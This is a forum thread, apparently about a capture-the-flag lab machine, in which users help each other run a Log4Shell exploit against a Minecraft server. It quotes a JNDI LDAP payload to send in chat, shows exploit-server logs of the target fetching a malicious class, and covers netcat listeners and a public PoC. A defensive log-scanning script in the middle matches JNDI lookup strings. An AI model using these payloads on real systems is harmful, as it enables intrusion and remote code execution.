Posts: 6
Threads: 1
Joined: Nov 2023
(Feb 10, 2024, 11:47 PM)iNone Wrote: (Feb 10, 2024, 11:44 PM)L453R Wrote: (Feb 10, 2024, 11:03 PM)0xfd9aac Wrote: Can someone share working payload for malicious class (revshell)? 15 attempts and 0 result.
Maybe you need the good version of java, i used this one: https://repo.huaweicloud.com/java/jdk/8u...x64.tar.gz.
Classic payload from reverseshells.com base64 encoded
is not necessary ${jndi:ldap://ip:port/a} ??
Yes it is, in the game, but the created class must be compiled with the appropriate version of java
Posts: 7
Threads: 0
Joined: Feb 2024
(Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but it isn't working
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
Posts: 7
Threads: 0
Joined: Dec 2023
(Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but it isn't working
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
Posts: 7
Threads: 0
Joined: Feb 2024
(Feb 11, 2024, 12:12 AM)fucksurveillance Wrote: (Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but it isn't working
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
you just have to copy your jdk folder to the repo directory, rename it to jdk1.8.0_20 and use netcat to listen on a port. Then send the message ${jndi:ldap://10.10.x.x:1389/a} in minecraft chat
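From the defending side, the lookup string quoted in this thread shows up in the server's own log, and the host and port inside it are the endpoint to look for in egress records. The following is an added example, not code from any poster or from the PoC linked above: it scans log lines for JNDI lookup strings and extracts the callback endpoint. The log formats, sample lines and addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Remote-capable JNDI schemes; ldap is the one quoted in the thread.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<url>(?:ldaps?|rmi|dns|iiop)://[^}\s]+)\}",
    re.IGNORECASE,
)

# Constructed sample lines (documentation-range addresses), not real logs.
SAMPLE_LOG = [
    "[23:41:07] [Server thread/INFO]: <player1> hello",
    "[23:41:15] [Server thread/INFO]: <player2> ${jndi:ldap://192.0.2.10:1389/a}",
    '198.51.100.20 - - "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7'
    '%3A1099%2Fobj%7D HTTP/1.1" 200',
]


def find_jndi_lookups(line):
    """Return (scheme, host, port, path) for each JNDI lookup in a log line."""
    # Access logs often record the string percent-encoded, so decode once.
    decoded = unquote(line)
    hits = []
    for match in JNDI_RE.finditer(decoded):
        parts = urlsplit(match.group("url"))
        try:
            port = parts.port
        except ValueError:  # non-numeric port, e.g. a literal "port"
            port = None
        hits.append((parts.scheme, parts.hostname, port, parts.path))
    return hits


def callback_endpoints(lines):
    """Distinct (host, port) pairs to check against firewall/proxy egress logs."""
    seen = set()
    for line in lines:
        for _scheme, host, port, _path in find_jndi_lookups(line):
            seen.add((host, port))
    return sorted(seen)


if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, start=1):
        for hit in find_jndi_lookups(line):
            print(f"line {number}: {hit}")
    print("egress endpoints to review:", callback_endpoints(SAMPLE_LOG))
```

A literal match like this is a first-pass filter over logs, not proof that a host was never targeted.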
Posts: 14
Threads: 1
Joined: Jan 2024
so there are many skids in this thread that can't even Run minecraft. it's pretty funny. won't spoonfeed but will help i guess.
1. use a console UI for minecraft. (use google)
2. use kozmer poc
3. get jdk 8u20 to use with kozmer poc
4. it will fail unless you update the poc.py. if you're too dumb to realize why after looking at the code, it's time to logoff of life.
5. it will work if u follow above steps
root is hard though, exhausted all tricks i know. going to reenum again
Posts: 7
Threads: 0
Joined: Feb 2024
Feb 11, 2024, 12:21 AM
(This post was last modified: Feb 11, 2024, 12:23 AM by pwnbox.)
any hint for root flag?
(Feb 11, 2024, 12:21 AM)tiresomeenergy Wrote: so there are many skids in this thread that can't even Run minecraft. it's pretty funny. won't spoonfeed but will help i guess.
1. use a console UI for minecraft. (use google)
2. use kozmer poc
3. get jdk 8u20 to use with kozmer poc
4. it will fail unless you update the poc.py. if you're too dumb to realize why after looking at the code, it's time to logoff of life.
5. it will work if u follow above steps
root is hard though, exhausted all tricks i know. going to reenum again
im stuck at root too, i really hate windows machines
Posts: 14
Threads: 1
Joined: Jan 2024
(Feb 11, 2024, 12:31 AM)wenston91 Wrote: (Feb 11, 2024, 12:12 AM)fucksurveillance Wrote: (Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but it isn't working
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
read the fcking script you are executing, this is a windows machine
sssshhhhhh don't speenfood le skiddos
Posts: 134
Threads: 13
Joined: Sep 2023
for root look where you're dropped into when you get the foothold
Posts: 2
Threads: 0
Joined: Feb 2024
If you're having issues getting foothold.. David Bombal did a video on this.. link to John Hammond's video in the description of that video.. EZPZ.